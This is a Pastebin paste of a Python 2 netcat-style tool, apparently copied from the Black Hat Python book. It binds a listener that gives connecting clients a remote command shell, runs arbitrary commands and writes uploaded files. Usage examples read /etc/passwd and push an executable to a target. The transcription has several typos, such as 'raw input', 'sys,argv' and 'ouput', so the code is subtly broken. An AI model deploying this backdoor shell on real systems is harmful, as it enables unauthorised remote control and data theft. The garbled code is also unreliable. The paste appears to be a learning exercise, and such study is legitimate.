Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #
- # Netcat
- # Brett Stroud
- # 01/20/2019
- # v1.0
- # netcat.py
- #
- import sys
- import socket
- import getopt
- import threading
- import subprocess
- # Define global variables
- listen = False
- command = False
- upload = False
- execute = ""
- target = ""
- upload_destination = ""
- port = 0
- def usage():
- print "BHP Net Tool"
- print
- print "Usage: bhpnet.py -t target_host -p port"
- print """-l --listen - listen on [host]:[port] for
- incoming connections"""
- print """-e --execute=file_to_run - execute the given file upon
- receiving a connection"""
- print """-c --command - initialize a command shell"""
- print """-u --upload=destination - upon receiving connection upload a
- file and write to [destination]"""
- print
- print
- print "Examples: "
- print "bhpnet.py -t 192.169.0.1 -p 5555 -1 -c"
- print "bhpnet.py -t 192.168.0.1 -p 5555 -1 -u=c:\\target.exe"
- print "bhpnet.py -t 192.168.0.1 -p 5555 -1 -e=\"cat /etc/passwd\""
- print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"
- sys.exit(0)
- def client_sender(buffer):
- client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- try:
- # Attempt to establish connection with targeted host
- client.connect((target, port))
- if len(buffer):
- client.send(buffer)
- while True:
- # Await response
- recv_len = 1
- response = ""
- while recv_len:
- data = client.recv(4096)
- recv_len = len(data)
- response+= data
- if recv_len < 4096:
- break
- print response,
- # Await further input
- buffer = raw input("")
- buffer += "\n"
- # Send data
- client.send(buffer)
- except:
- print "[*] Exception detected! Exiting IMMEDIATELY."
- # Terminate the connection
- client.close()
- def server_loop():
- global target
- # If a target is not specified LISTEN ON ALL INTERFACES
- if not len(target):
- target = "0.0.0.0"
- server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- server.bind((target, port))
- server.listen(5)
- while True:
- client_socket, addr = server.accept()
- # Create a new thread to process the incoming client
- client_thread = threading.Thread(target=client_handler,args=(client_socket,))
- client_thread.start()
- def run_command(command):
- # Trim newline [newline = \n]
- command = command.rstrip()
- # Get output from STDOUT resulting from executing command
- try:
- ouput = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
- except:
- output = "[*]Command Failed to Execute!\r\n"
- # Return resulting output to the client
- return output
- def client_handler(client_socket):
- global upload
- global execute
- global command
- # Run upload check
- if len(upload_destination):
- # Read in all bytes to memory and write to destination
- file_buffer = ""
- # Read data until nothing else is available
- while True:
- data = client_socket.recv(1024)
- if not data:
- break
- else:
- file_buffer += data
- # Attempt to write out the following bytes of data
- try:
- file_descriptor = open(upload_destination,"wb")
- file_descriptor.write(file_buffer)
- file_descriptor.close()
- # Confirm file was written out successfully
- client_socket.send("FILE WRITTEN TO: %s\r\n" % upload_destination)
- except:
- client_socket.send("FILE NOT WRITTEN TO: %s\r\n" % upload_destination)
- # Check for command execution
- if len(execute):
- # Run command
- output = run_command(execute)
- client_socket.send(output)
- # Enter secondary loop if command shell requested
- if command:
- while True:
- # Draw a simple prompt
- client_socket.send("<BHP:#> ")
- # Continue receiving until linefeed
- # is displayed (enter key)
- cmd_buffer = ""
- while "\n" not in cmd_buffer:
- cmd_buffer += client_socket.recv(1024)
- # Return the command output
- response = run_command(cmd_buffer)
- # Return the response
- client_socket.send(response)
- def main():
- global listen
- global port
- global execute
- global command
- global upload_destination
- global target
- if not len(sys,argv[1:]):
- usage()
- # Read the commandline options
- try:
- opts,args = getopt.getopt(sys,argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])
- except getopt.GetoptError as err:
- print str(err)
- usage()
- for o,a in opts:
- if o in ("-h", "--help"):
- usage()
- elif o in ("-l", "--listen"):
- listen = True
- elif o in ("-e", "--execute"):
- execute = a
- elif o in ("-c", "--commandshell"):
- command = True
- elif o in ("-u", "--upload"):
- upload_destination = a
- elif o in ("-t", "--target"):
- target = a
- elif o in ("-p", "--port"):
- port = int(a)
- else:
- assert False, "Unhandled Option"
- # Are we going to listen or just send data from stdin?
- if not listen and len(target) and port > 0:
- # Read in the buffer from the commandline
- # this will block, so send CTRL-D if not
- # sending input to stdin
- buffer = sys.stdin.read()
- # Send data off
- client_sender(buffer)
- # We are going to listen and potentially
- # upload things, execute commands, and drop a shell back
- # depending on our command line options above
- if listen:
- server_loop()
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement